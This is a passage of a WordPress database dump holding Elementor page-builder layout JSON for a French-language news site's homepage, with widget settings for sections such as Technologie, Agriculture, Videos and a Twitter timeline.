on_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2428,776,'_elementor_version','0.4'),(2429,777,'_elementor_edit_mode','builder'),(2430,777,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255